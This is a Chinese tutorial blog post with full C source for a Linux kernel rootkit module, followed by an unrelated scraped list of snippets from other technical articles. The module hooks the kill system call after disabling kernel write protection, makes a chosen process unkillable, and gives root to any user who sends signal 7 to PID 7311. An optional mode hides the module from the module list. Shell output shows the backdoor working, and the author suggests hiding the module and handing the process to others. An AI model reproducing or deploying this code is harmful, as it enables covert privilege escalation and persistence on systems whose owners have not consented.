手把手教你写LKM rookit! 之 杀不死的pid&root后门

......上一节,我们编写了一个基本的lkm模块,从功能上来说它还没有rootkit的特征,这次我们给它添加一点有意思的功能.我们让一个指定的进程杀不死,

    曾经,想写一个谁也杀不死的进程,进程能捕捉到SIGTERM,就是kill默认发送的signal,能捕捉到SIGINT,你平时按下Ctrl-C就是这个操作,但是无论如何你也无法阻止,

SIGKILL,及终极杀人王火云邪神的必杀kill -9 pid.

    作为一个小强,怎么能被现实如此的摧残,我们要对命运说不,so 有个几种解决方案,一中方案:两个进程互相监听,另外一个死了,立马起一个新的进程,另外一种方案:

我们想是谁让kill -9 就能杀死程序的?是谁?对是操作系统?作为一切操作皆系统调用来说,kill也是系统调用啊.....所以我们可以改系统调用就行了,而且在内核态可以无视用户,

随便切换个uid都是小意思.

     废话不多,上代码

#include <asm/unistd.h>

#include <linux/highmem.h>

#include <asm/current.h>

#include <linux/sched.h>

#include <linux/kernel.h>

#include <linux/module.h>

#include <linux/init.h>

#include <linux/slab.h>

#include <linux/list.h>

#include <linux/dirent.h>

#include <linux/string.h>

#include <linux/fdtable.h>

#include <linux/moduleparam.h>



MODULE_AUTHOR("[email protected]");

MODULE_LICENSE("GPL");

MODULE_DESCRIPTION("rootkit_sample");



#define ROOT_PID 7311

#define ROOT_SIG 7



static int lpid = 1137;

module_param(lpid, int, 0);



//#define STEALTH_MODE 1 



unsigned long *sys_call_table = (unsigned long*) 0xc12efee0;



static unsigned int ocr0;



unsigned int clear_cr0(){

    unsigned int cr0 = read_cr0();

    write_cr0(cr0 & 0xfffeffff);

    return cr0;

}



typedef asmlinkage int (*kill_ptr)(pid_t pid, int sig);

kill_ptr orig_kill;



asmlinkage int hacked_kill(pid_t pid, int sig){

    int actual_result;



    //root-access

    if (pid == ROOT_PID && sig == ROOT_SIG){

        struct cred *cred;

        cred = (struct cred *)__task_cred(current);

        cred->uid = 0;

        cred->gid = 0;

        cred->suid = 0;

        cred->euid = 0;

        cred->euid = 0;

        cred->egid = 0;

        cred->fsuid = 0;

        cred->fsgid = 0;

        return 0;        

    }else if(pid == lpid){

        printk(KERN_INFO "You cannot kill me! by process %d", lpid);

        return 0;

    }    

    

    actual_result = (*orig_kill)(pid, sig);

    return actual_result;

}





static int rootkit_in(void){           

#ifdef STEALTH_MODE

    struct module *self;

#endif

    ocr0 = clear_cr0();

    orig_kill = (kill_ptr)sys_call_table[__NR_kill]; //hooking

    sys_call_table[__NR_kill] = (unsigned long) hacked_kill;

    write_cr0(ocr0);

#ifdef STEALTH_MODE

    mutex_lock(&module_mutex);

    if((self = find_module("test")))

        list_del(&self->list);

    mutex_unlock(&module_mutex);

#endif    

    printk(KERN_INFO "Loading rookit\n");

    return 0;

}



static int rootkit_out(void){

    ocr0 = clear_cr0();

    sys_call_table[__NR_kill] = (unsigned long) orig_kill;

    write_cr0(ocr0);    

    printk(KERN_INFO "Romove rookit\n");

    return 0;

}



module_init(rootkit_in);

module_exit(rootkit_out);

 

    需要说明的几点是0xc12efee0这个地址每个人都不一样的,它在/boot/System.map-`uname -r`记录着,他表示sys_call_table的地址

    cat /boot/System.map-`uname -r` | grep sys_call

unsigned long *sys_call_table = (unsigned long*) 0xc12efee0;

    基本的使用就是

1.先随便起个进程,这里以我们的哪个deamon后台签到程序为例./l137,记录pid 为 13165

liet@kali:~/code/c/study/socket/http/bbs_sign$ ./l137 

liet@kali:~/code/c/study/socket/http/bbs_sign$ ps aux | grep l137

liet     13165  0.0  0.0   1844   280 ?        S    16:47   0:00 ./l137

liet     13224  0.0  0.0   3484   776 pts/1    S+   16:48   0:00 grep l137

liet@kali:~/code/c/study/socket/http/bbs_sign$

2.加载rootkit

liet@kali:~/code/c/study/virus/toykit/toykit_or/test$ sudo insmod test.ko lpid=13165

liet@kali:~/code/c/study/virus/toykit/toykit_or/test$ dmesg | tail

[  407.885977] warning: `VirtualBox' uses 32-bit capabilities (legacy support in use)

[  415.515641] device eth0 entered promiscuous mode

[  813.787144] Loading rookit

[  829.538917] Now set cr0 backed ,cr0: 8005003b

[  829.538921] Romove rookit

[ 2231.927831] Loading rookit

[ 2388.490838] Now set cr0 backed ,cr0: 8005003b

[ 2388.490842] Romove rookit

[ 2503.793892] test: `13165' invalid for parameter `pid'

[ 2508.832296] Loading rookit

liet@kali:~/code/c/study/virus/toykit/toykit_or/test$

ok, rootkit loaded!!!!

3.rootkit操作

   1.杀不死的13165进程

liet@kali:~/code/c/study/socket/http/bbs_sign$ kill -9 13165

liet@kali:~/code/c/study/socket/http/bbs_sign$ ps aux | grep l137

liet     13165  0.0  0.0   1844   280 ?        S    16:47   0:00 ./l137

liet     17537  0.0  0.0   3488   776 pts/1    S+   16:52   0:00 grep l137

  2.root后门

    

liet@kali:~/code/c/study/socket/http/bbs_sign$ id

uid=1000(liet) gid=1000(liet) groups=1000(liet),20(dialout),27(sudo)

liet@kali:~/code/c/study/socket/http/bbs_sign$ kill -7 7311

liet@kali:~/code/c/study/socket/http/bbs_sign$ id

uid=0(root) gid=0(root) groups=0(root),20(dialout),27(sudo),1000(liet)

liet@kali:~/code/c/study/socket/http/bbs_sign$

 

你整好了一个进程之后,然后隐藏mod,再交给别人,让他杀吧,看他怎么杀,........

 

你可能感兴趣的:(root)

  • python抓包与解包_Python—网络抓包与解包(pcap、dpkt) weixin_39691055 python抓包与解包
    pcap安装[root@localhost~]#pipinstallpypcap抓包与解包#-*-coding:utf-8-*-importpcap,dpktimportre,threading,requests__black_ip=['103.224.249.123','203.66.1.212']#抓包:param1eth_name网卡名,如:eth0,eth3。param2p_type日志捕
  • linux基础命令(一) 运维搬运工 linuxlinux服务器centos
    Linux基础命令1、设置主机名1.1、hostname查看主机名[root@ansible~]#cat/etc/hostnameansible或[root@ansible~]#hostnameansible注意:主机名中不允许使用下划线“_”,可以用短横线“-”1.2、hostname临时修改主机名#临时修改直接修改的是内存中的,重启会失效[root@ansible~]#hostnameansi
  • Linux(centos7)部署hive 灯下夜无眠 Linuxlinuxhive运维dbeaverhive客户端
    前提环境:已部署完hadoop(HDFS、MapReduce、YARN)1、安装元数据服务MySQL切换root用户#更新密钥rpm--importhttps://repo.mysql.com/RPM-GPG-KEY-mysqL-2022#安装Mysqlyum库rpm-Uvhhttp://repo.mysql.com//mysql57-community-release-el7-7.noarch.
  • 二叉树|617.合并二叉树 亦小河 算法
    力扣题目链接classSolution{public:TreeNode*mergeTrees(TreeNode*t1,TreeNode*t2){if(t1==NULL)returnt2;if(t2==NULL)returnt1;//重新定义新的节点,不修改原有两个树的结构TreeNode*root=newTreeNode(0);root->val=t1->val+t2->val;root->lef
  • vscode配置go远程linux gdut17 golang
    Toolsenvironment:GOPATH=/root/goInstalling9toolsat/root/go/bininmodulemode.gopkgsgo-outlinegotestsgomodifytagsimplgoplaydlvgolintgoplsInstallinggithub.com/uudashr/gopkgs/v2/cmd/gopkgs(/root/go/bin/gop
  • centos7中的MySQL安装 老伙子53 mysql数据库
    centos7中的MySQL安装一、MySQL5.7.17安装脚本#!/bin/bashcd/rootmkdirmysql_tarwgethttps://downloads.mysql.com/archives/get/p/23/file/mysql-community-server-5.7.17-1.el7.x86_64.rpmwgethttps://downloads.mysql.com/ar
  • Linux系统定时备份mysql数据库 er_得一 数据库mysqloracle
    1、创建shell脚本mysql_db_backup并赋予执行权限#!/bin/bash#备份目录BACKUP=/data/backup/db#当前时间DATETIME=$(date+%Y-%m-%d_%H%M%S)echo$DATETIME#数据库地址HOST=localhost#数据库用户名DB_USER=root#数据库密码DB_PW=pwd@123#备份的数据库名DATABASE=Apol
  • 解决sqlalchemy执行语句提示Not an executable object 娜年花开666 #Pythonandroid
    问题:fromsqlalchemyimportcreate_engine#数据库的变量HOST='127.0.0.1'PORT=3306DATA_BASE='itbz'USER='root'PWD='123456'#DB_URL=f'数据库的名+驱动名://{USER}:{PWD}@{HOST}:{PORT}/{DATA_BASE}'DB_URL=f'mysql+pymysql://{USER}:
  • mysqldump 参数说明 yjph83 mysql/mycat数据库
    参数说明--all-databases,-A导出全部数据库。mysqldump-uroot-p--all-databases--all-tablespaces,-Y导出全部表空间。mysqldump-uroot-p--all-databases--all-tablespaces--no-tablespaces,-y不导出任何表空间信息。mysqldump-uroot-p--all-database
  • 03-10Linux的文件系统 圆缘1987
    Linux的文件系统:根文件系统(rootfs):rootfilesystemLSB,FHS/boot:引导文件存放目录:内核文件(vmlinuz),引导加载器(bootloader,grub)都存放于此目录/bin:供所有用户使用的基本命令;不能关联至独立分区,OS启动会用到的程序/sbin:管理类的基本命令;不能关联至独立分区,OS启动会用到的程序/lib:基本共享库文件,以及内核模块文件(/
  • 【Docker】【nginx】docker安装nginx并映射宿主机配置文件地址 小丛的知识窝 nginxdocker运维
    dockerrun-d-p80:80-v/root/docker/docker-nginx/nginx.conf:/etc/nginx/nginx.conf-v/root/docker/docker-nginx/html:/usr/share/nginx/html-v/root/docker/docker-nginx/logs:/var/log/nginx--namenginxnginx
  • Linux 常用命令 chgrp 专注的罗哈哈 Linux常用命令linux运维
    Linux常用命令chgrp作用用于更改文件或目录的所属用户组。只有文件的所有者或超级用户(root)可以使用chgrp命令来更改文件的所属用户组。在使用chgrp命令时需要谨慎操作,确保对文件和目录进行正确的用户组更改,以避免意外修改导致的权限问题。用法第一种:chgrp[OPTION]...GROUPFILE...第二种:chgrp[OPTION]...--reference=RFILEFIL
  • Linux shell脚本切换为root用户执行命令 红色石榴 linux
    首先安装expect。sudoaptinstallexpect创建shell脚本文件,示例内容如下:#!/usr/bin/expectspawnsurootexpect{"密码:"{send"00000\r"}"Password:"{send"000000\r"}}send"./user_app\r"expecteofexit其中,"000000\r"是root用户密码。send语句用于向终端传递
  • 使用 BPF 监控 Kubernetes 集群(k8s BPF 工具 kubectl-trace认知 山河已无恙 K8s&kubelct插件BPFkubernetes容器云原生
    写在前面学习中遇到,整理分享,博文内容涉及:kubectl-trace安装,在节点,容器中如何使用需要注意的问题:job闪完成,一直Pending状态解决理解不足小伙伴帮忙指正不必太纠结于当下,也不必太忧虑未来,当你经历过一些事情的时候,眼前的风景已经和从前不一样了。——村上春树kubectl-trace安装┌──[[email protected]]-[~/ansi
  • RabbitMQ学习笔记:节点名称详解、rabbitmq-server、及rabbitmq-env.conf Bejpse javajava后端
    rabbitmq-serverrabbitmq-server启动一个RabbitMQ节点1.rabbitmq-server在前端启动一个RabbitMQ节点,示例如下:[root@rabbit3rabbitmq]#rabbitmq-server####RabbitMQ3.8.1##############Copyright(c)2007-2019PivotalSoftware,Inc.######
  • Docker 命令大全 箭头大人 docker容器运维
    Docker命令大全容器生命周期管理runstart/stop/restartkillrmpause/unpausecreateexec容器操作psinspecttopattacheventslogswaitexportportstats容器rootfs命令commitcpdiff镜像仓库loginpullpushsearch本地镜像管理imagesrmitagbuildhistorysavelo
  • 【RH134问答题】第十章 控制启动过程 不怕娜 服务器数据库网络
    系列文章第一章提高命令行生产效率第二章计划将来的任务第三章调优系统性能第四章使用ACL控制对文件的访问第五章管理SELinux安全性第六章管理基本存储第七章管理逻辑卷第八章实施高级存储功能第九章访问网络附加存储目录系列文章请简要说明RHEL8的启动过程。系统重启和关机的命令分别是什么?Systemdtarget是什么?重置丢失的root密码需要哪些步骤?如何让系统日志在重启后持久保留?请简要说明R
  • Android 大神jessyan的bintray配置 Alex富贵
    记录bintray.gradle文件自己添加了一点注释,方便以后使用applyplugin:'com.jfrog.bintray'applyplugin:'com.github.dcendents.android-maven'Propertiesproperties=newProperties()booleanisHasFile=falseif(project.rootProject.findPr
  • 【Linux】linux的常用命令 五敷有你 linuxlinux运维服务器
    个人主页:五敷有你系列专栏:MQ⛺️稳中求进,晒太阳(Linux常用命令)finalShell1.ls命令作用:显示当前目录下的文件及文件夹举例:在用户目录(root)使用ls可以查看用户目录里的文件及文件夹参数:-l详细列出文件和文件夹ll2.cd命令作用:切换目录举例:cd../返回上一级目录cdroot进入用户目录(相对路径)cd子目录名直接进去当前目录下下的子目录cd~进去用户目录(绝对目
  • 【Nginx】使用普通用户安装和运行Nginx经验分享 cnskylee Nginxnginx安全运维
    各位做运维的小伙伴在日常工作中,可能都会习惯性的使用root超级用户来安装和运行Nginx。但是,如果所在的公司有安全部门,他们就可能会强烈的建议你将Nginx的运行用户整改为普通用户,来提升系统的安全性。下面我来分享下自己整改的一个过程和细节经验。Nginx的安装是需要使用root超级用户的,但是我们可以在安装命令中添加参数,让Nginx被安装到指定的用户和组(如app用户、app组)目录下。安
  • C++ (leetcode)min(const T& a, const T& b) 饿了就去喝水 c++leetcodejava算法
    1.使用min()函数-包括标题或者简单使用头文件。参数:constT&a,constT&b–要比较的值。返回值:T–它返回T类型的最小值。如果使用在一个循环里,比较该数字和后一个数字的话,min(nums[i],nums[i-1])得到的结果就是一系列数组中差的最小值。例题:二叉搜索树的最小绝对差给你一个二叉搜索树的根节点root,返回树中任意两不同节点值之间的最小差值。差值是一个正数,其数值等
  • Docker——Redis部署 梦想的边缘 运维redisdocker
    Redis通过Docker容器化部署流程1.创建容器dockerrun-d--nameredis--restart=always-p6379:6379redis:5.0.14-alpine备注:redis版本选取5.0.14版本,端口号默认为6379执行成功的结果:[root@node1~]#dockerrun-d--nameredis--restart=always-p6379:6379redi
  • mysql报错日志查看 youhebuke225 SQLServermysql数据库
    路径命令在MySQL命令行客户端中,执行SHOWVARIABLESLIKE'log_error';这个命令可以显示log_error系统变量的值,这个值通常指向MySQL的错误日志文件(errorlog)的路径。通过这个命令,你可以快速找到MySQL的报错日志文件的位置。这里是如何操作的:首先,登录到MySQL命令行客户端。你可以使用以下命令(以root用户为例)登录:mysql-uroot-p输
  • 客户端渲染与服务端渲染(2) 程序员榕叔 javascriptreact.js前端
    客户端渲染即普通的React项目渲染方式。客户端渲染流程:浏览器发送请求服务器返回HTML浏览器发送bundle.js请求服务器返回bundle.js浏览器执行bundle.js中的React代码CSR带来的问题:首屏加载时间过长SEO不友好因为时间在往返的几次网络请求中就耽搁了,而且因为CSR返回到页面的HTML中没有内容,就只有一个root空元素,页面内容是靠js渲染出来的,爬虫在读取网页时就
  • Docker环境快速搭建RocketMq 上海第一深情Enoch #精通RocketMQdockerrocketmq容器
    window上面安装:1.Namesrvdockerpullrocketmqinc/rocketmq创建C:/docker/rocketmq/data/namesrv/logs:/root/logsC:/docker/rocketmq/data/namesrv/store:/root/store目录namesrv:dockerrun-d--restart=always--namermqnamesr
  • 二刷代码随想录算法训练营第二十三天 | 669. 修剪二叉搜索树、108.将有序数组转换为二叉搜索树、538.把二叉搜索树转换为累加树 magic bamboo 算法leetcode数据结构
    目录一、669.修剪二叉搜索树二、108.将有序数组转换为二叉搜索树三、538.把二叉搜索树转换为累加树一、669.修剪二叉搜索树题目链接:力扣文章讲解:代码随想录视频讲解:你修剪的方式不对,我来给你纠正一下!|LeetCode:669.修剪二叉搜索树题目:给你二叉搜索树的根节点root,同时给定最小边界low和最大边界high。通过修剪二叉搜索树,使得所有节点的值在[low,high]中。修剪树
  • react native使用TS实现路由 前方路远 reactnativetypescript
    一、入口文件app.jsx的配置入口文件最好还是要保留jsximport{NavigationContainer}from'@react-navigation/native';import{navigationRef}from"./src/views/RootNavigation";constApp=()=>{return()}二、HomeScreen自定义你的tabbar导航一般情况下项目里都是
  • python 各种遍历文件夹的方法 骐骥1 python开发语言
    Python提供了一些库,可以帮助我们实现文件夹遍历。在本文中,我将介绍三种常用的遍历文件夹的方法,并且给出每种方法的使用示例和优缺点分析。方法一:os.walk()os.walk()是Python中最常用的遍历文件夹的方法。这个方法会自动地递归遍历文件夹中的所有子文件夹。在遍历过程中,返回的是一个元组(root,dirs,files),其中root表示当前遍历到的文件夹的路径,dirs表示当前文
  • 力扣111---二叉树的最小深度(简单题,Java,递归+非递归) 顾城猿 leetcode算法职场和发展
    目录题目描述:(递归)代码:(非递归、层次遍历)代码:题目描述:给定一个二叉树,找出其最小深度。最小深度是从根节点到最近叶子节点的最短路径上的节点数量。说明:叶子节点是指没有子节点的节点。示例1:输入:root=[3,9,20,null,null,15,7]输出:2示例2:输入:root=[2,null,3,null,4,null,5,null,6]输出:5提示:树中节点数的范围在[0,10^5]
  • dockers拉取MySQL及Redis并挂载文件 好运—— mysqlredis数据库
    目录一.MySQL拉取1、进入MySQL容器内部。2、登录MySQL。3、修改远程连接4、刷新二.Redis拉取1.redis/conf中新建文件redis.conf,内容如下:2.容器运行一.MySQL拉取dockerrun-d--restart=always--namemysql\-v/root/mysql/data:/var/lib/mysql\-v/root/mysql/conf:/etc
  • 继之前的线程循环加到窗口中运行 3213213333332132 javathreadJFrameJPanel
    之前写了有关java线程的循环执行和结束,因为想制作成exe文件,想把执行的效果加到窗口上,所以就结合了JFrame和JPanel写了这个程序,这里直接贴出代码,在窗口上运行的效果下面有附图。 package thread; import java.awt.Graphics; import java.text.SimpleDateFormat; import java.util
  • linux 常用命令 BlueSkator linux命令
    1.grep 相信这个命令可以说是大家最常用的命令之一了。尤其是查询生产环境的日志,这个命令绝对是必不可少的。 但之前总是习惯于使用 (grep -n 关键字 文件名 )查出关键字以及该关键字所在的行数,然后再用 (sed -n  '100,200p' 文件名),去查出该关键字之后的日志内容。 但其实还有更简便的办法,就是用(grep  -B n、-A n、-C n 关键
  • php heredoc原文档和nowdoc语法 dcj3sjt126com PHPheredocnowdoc
    <!doctype html> <html lang="en"> <head> <meta charset="utf-8"> <title>Current To-Do List</title> </head> <body> <?
  • overflow的属性 周华华 JavaScript
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml&q
  • 《我所了解的Java》——总体目录 g21121 java
            准备用一年左右时间写一个系列的文章《我所了解的Java》,目录及内容会不断完善及调整。         在编写相关内容时难免出现笔误、代码无法执行、名词理解错误等,请大家及时指出,我会第一时间更正。    &n
  • [简单]docx4j常用方法小结 53873039oycg docx
            本代码基于docx4j-3.2.0,在office word 2007上测试通过。代码如下:         import java.io.File; import java.io.FileInputStream; import ja
  • Spring配置学习 云端月影 spring配置
    首先来看一个标准的Spring配置文件 applicationContext.xml <?xml version="1.0" encoding="UTF-8"?> <beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi=&q
  • Java新手入门的30个基本概念三 aijuans java新手java 入门
    17.Java中的每一个类都是从Object类扩展而来的。  18.object类中的equal和toString方法。  equal用于测试一个对象是否同另一个对象相等。  toString返回一个代表该对象的字符串,几乎每一个类都会重载该方法,以便返回当前状态的正确表示.(toString 方法是一个很重要的方法)   19.通用编程:任何类类型的所有值都可以同object类性的变量来代替。 
  • 《2008 IBM Rational 软件开发高峰论坛会议》小记 antonyup_2006 软件测试敏捷开发项目管理IBM活动
    我一直想写些总结,用于交流和备忘,然都没提笔,今以一篇参加活动的感受小记开个头,呵呵! 其实参加《2008 IBM Rational 软件开发高峰论坛会议》是9月4号,那天刚好调休.但接着项目颇为忙,所以今天在中秋佳节的假期里整理了下. 参加这次活动是一个朋友给的一个邀请书,才知道有这样的一个活动,虽然现在项目暂时没用到IBM的解决方案,但觉的参与这样一个活动可以拓宽下视野和相关知识.
  • PL/SQL的过程编程,异常,声明变量,PL/SQL块 百合不是茶 PL/SQL的过程编程异常PL/SQL块声明变量
    PL/SQL;    过程; 符号; 变量; PL/SQL块; 输出; 异常;     PL/SQL 是过程语言(Procedural Language)与结构化查询语言(SQL)结合而成的编程语言PL/SQL 是对 SQL 的扩展,sql的执行时每次都要写操作
  • Mockito(三)--完整功能介绍 bijian1013 持续集成mockito单元测试
            mockito官网:http://code.google.com/p/mockito/,打开documentation可以看到官方最新的文档资料。 一.使用mockito验证行为 //首先要import Mockito import static org.mockito.Mockito.*; //mo
  • 精通Oracle10编程SQL(8)使用复合数据类型 bijian1013 oracle数据库plsql
    /* *使用复合数据类型 */ --PL/SQL记录 --定义PL/SQL记录 --自定义PL/SQL记录 DECLARE TYPE emp_record_type IS RECORD( name emp.ename%TYPE, salary emp.sal%TYPE, dno emp.deptno%TYPE ); emp_
  • 【Linux常用命令一】grep命令 bit1129 Linux常用命令
    grep命令格式   grep [option] pattern [file-list]     grep命令用于在指定的文件(一个或者多个,file-list)中查找包含模式串(pattern)的行,[option]用于控制grep命令的查找方式。   pattern可以是普通字符串,也可以是正则表达式,当查找的字符串包含正则表达式字符或者特
  • mybatis3入门学习笔记 白糖_ sqlibatisqqjdbc配置管理
    MyBatis 的前身就是iBatis,是一个数据持久层(ORM)框架。  MyBatis 是支持普通 SQL 查询,存储过程和高级映射的优秀持久层框架。MyBatis对JDBC进行了一次很浅的封装。   以前也学过iBatis,因为MyBatis是iBatis的升级版本,最初以为改动应该不大,实际结果是MyBatis对配置文件进行了一些大的改动,使整个框架更加方便人性化。
  • Linux 命令神器:lsof 入门 ronin47 lsof
           lsof是系统管理/安全的尤伯工具。我大多数时候用它来从系统获得与网络连接相关的信息,但那只是这个强大而又鲜为人知的应用的第一步。将这个工具称之为lsof真实名副其实,因为它是指“列出打开文件(lists openfiles)”。而有一点要切记,在Unix中一切(包括网络套接口)都是文件。 有趣的是,lsof也是有着最多
  • java实现两个大数相加,可能存在溢出。 bylijinnan java实现
    import java.math.BigInteger; import java.util.regex.Matcher; import java.util.regex.Pattern; public class BigIntegerAddition { /** * 题目:java实现两个大数相加,可能存在溢出。 * 如123456789 + 987654321
  • Kettle学习资料分享,附大神用Kettle的一套流程完成对整个数据库迁移方法 Kai_Ge Kettle
    Kettle学习资料分享   Kettle 3.2 使用说明书 目录 概述..........................................................................................................................................7 1.Kettle 资源库管
  • [货币与金融]钢之炼金术士 comsci 金融
           自古以来,都有一些人在从事炼金术的工作.........但是很少有成功的        那么随着人类在理论物理和工程物理上面取得的一些突破性进展......        炼金术这个古老
  • Toast原来也可以多样化 dai_lm androidtoast
    Style 1: 默认 Toast def = Toast.makeText(this, "default", Toast.LENGTH_SHORT); def.show(); Style 2: 顶部显示 Toast top = Toast.makeText(this, "top", Toast.LENGTH_SHORT); t
  • java数据计算的几种解决方法3 datamachine javahadoopibatisr-languer
    4、iBatis     简单敏捷因此强大的数据计算层。和Hibernate不同,它鼓励写SQL,所以学习成本最低。同时它用最小的代价实现了计算脚本和JAVA代码的解耦,只用20%的代价就实现了hibernate 80%的功能,没实现的20%是计算脚本和数据库的解耦。     复杂计算环境是它的弱项,比如:分布式计算、复杂计算、非数据
  • 向网页中插入透明Flash的方法和技巧 dcj3sjt126com htmlWebFlash
    将 Flash 作品插入网页的时候,我们有时候会需要将它设为透明,有时候我们需要在Flash的背面插入一些漂亮的图片,搭配出漂亮的效果……下面我们介绍一些将Flash插入网页中的一些透明的设置技巧。   一、Swf透明、无坐标控制  首先教大家最简单的插入Flash的代码,透明,无坐标控制:   注意wmode="transparent"是控制Flash是否透明
  • ios UICollectionView的使用 dcj3sjt126com
    UICollectionView的使用有两种方法,一种是继承UICollectionViewController,这个Controller会自带一个UICollectionView;另外一种是作为一个视图放在普通的UIViewController里面。 个人更喜欢第二种。下面采用第二种方式简单介绍一下UICollectionView的使用。 1.UIViewController实现委托,代码如
  • Eos平台java公共逻辑 蕃薯耀 Eos平台java公共逻辑Eos平台java公共逻辑
     Eos平台java公共逻辑 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 蕃薯耀 2015年6月1日 17:20:4
  • SpringMVC4零配置--Web上下文配置【MvcConfig】 hanqunfeng springmvc4
    与SpringSecurity的配置类似,spring同样为我们提供了一个实现类WebMvcConfigurationSupport和一个注解@EnableWebMvc以帮助我们减少bean的声明。   applicationContext-MvcConfig.xml <!-- 启用注解,并定义组件查找规则 ,mvc层只负责扫描@Controller --> <
  • 解决ie和其他浏览器poi下载excel文件名乱码 jackyrong Excel
       使用poi,做传统的excel导出,然后想在浏览器中,让用户选择另存为,保存用户下载的xls文件,这个时候,可能的是在ie下出现乱码(ie,9,10,11),但在firefox,chrome下没乱码, 因此必须综合判断,编写一个工具类:      /** * * @Title: pro
  • 挥洒泪水的青春 lampcy 编程生活程序员
    2015年2月28日,我辞职了,离开了相处一年的触控,转过身--挥洒掉泪水,毅然来到了兄弟连,背负着许多的不解、质疑——”你一个零基础、脑子又不聪明的人,还敢跨行业,选择Unity3D?“,”真是不自量力••••••“,”真是初生牛犊不怕虎•••••“,••••••我只是淡淡一笑,拎着行李----坐上了通向挥洒泪水的青春之地——兄弟连! 这就是我青春的分割线,不后悔,只会去用泪水浇灌——已经来到
  • 稳增长之中国股市两点意见-----严控做空,建立涨跌停版停牌重组机制 nannan408
       对于股市,我们国家的监管还是有点拼的,但始终拼不过飞流直下的恐慌,为什么呢?    笔者首先支持股市的监管。对于股市越管越荡的现象,笔者认为首先是做空力量超过了股市自身的升力,并且对于跌停停牌重组的快速反应还没建立好,上市公司对于股价下跌没有很好的利好支撑。    我们来看美国和香港是怎么应对股灾的。美国是靠禁止重要股票做空,在
  • 动态设置iframe高度(iframe高度自适应) Rainbow702 JavaScriptiframecontentDocument高度自适应局部刷新
    如果需要对画面中的部分区域作局部刷新,大家可能都会想到使用ajax。 但有些情况下,须使用在页面中嵌入一个iframe来作局部刷新。 对于使用iframe的情况,发现有一个问题,就是iframe中的页面的高度可能会很高,但是外面页面并不会被iframe内部页面给撑开,如下面的结构: <div id="content"> <div id=&quo
  • 用Rapael做图表 tntxia rap
    function drawReport(paper,attr,data){          var width = attr.width;     var height = attr.height;          var max = 0;   &nbs
  • HTML5 bootstrap2网页兼容(支持IE10以下) xiaoluode html5bootstrap
    <!DOCTYPE html> <html> <head lang="zh-CN"> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge">
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他